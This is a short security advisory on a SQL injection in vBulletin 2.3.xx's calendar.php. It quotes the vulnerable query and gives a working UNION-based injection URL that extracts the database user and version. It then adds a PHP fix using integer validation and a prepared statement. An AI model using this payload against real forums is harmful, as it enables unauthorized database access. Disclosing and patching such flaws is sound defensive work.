vBulletin Forum 2.3.xx SQL Injection

Jun 01, 2016 pm 12:38 PM

vBulletin Forum 2.3.xx has a SQL injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
      $eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function returns only the first row of the query result, so make sure it returns the one you want.
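The unquoted `$eventid` in the calendar.php excerpt is what lets request data change the query text. The following is an added example, not vBulletin's own code, of the same lookup with the value validated as an integer and passed as a bound parameter. It assumes PDO with an in-memory SQLite table as a stand-in for `$DB_site` and MySQL; `fetch_event_for_edit` and the sample rows are hypothetical.

```php
<?php
// Added example: stand-in for calendar.php's "edit" branch with the fix applied.
// Assumptions: PDO + in-memory SQLite replace $DB_site/MySQL; rows are constructed.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE calendar_events (eventid INTEGER PRIMARY KEY, allowsmilies INTEGER,
            public INTEGER, userid INTEGER, eventdate TEXT, event TEXT, subject TEXT)");
$pdo->exec("INSERT INTO calendar_events VALUES
            (12, 1, 1, 7, '2003-05-01', 'Board meeting', 'Agenda'),
            (13, 1, 0, 9, '2003-05-02', 'Private note', 'Hidden')");

// Hypothetical helper: returns the event row, or null for a bad or unknown id.
function fetch_event_for_edit(PDO $pdo, $rawEventId): ?array
{
    // 1. Type check: eventid must be a positive integer and nothing else.
    $eventId = filter_var($rawEventId, FILTER_VALIDATE_INT,
                          ['options' => ['min_range' => 1]]);
    if ($eventId === false) {
        return null;
    }
    // 2. Bound parameter: the value never becomes part of the SQL text.
    $stmt = $pdo->prepare('SELECT allowsmilies, public, userid, eventdate, event, subject
                           FROM calendar_events WHERE eventid = :eventid');
    $stmt->bindValue(':eventid', $eventId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: one valid id, then values that are not plain integers.
$inputs = ['12', '12 union (SELECT 1,1,1,1,1,1)', '12 order by eventdate', '-1', 'abc'];
foreach ($inputs as $input) {
    $row = fetch_event_for_edit($pdo, $input);
    printf("%-32s => %s\n", $input, $row ? 'event: ' . $row['event'] : 'rejected');
}
```

Either control alone closes this particular hole; using both keeps the query safe if the validation is later loosened or the parameter is reused elsewhere.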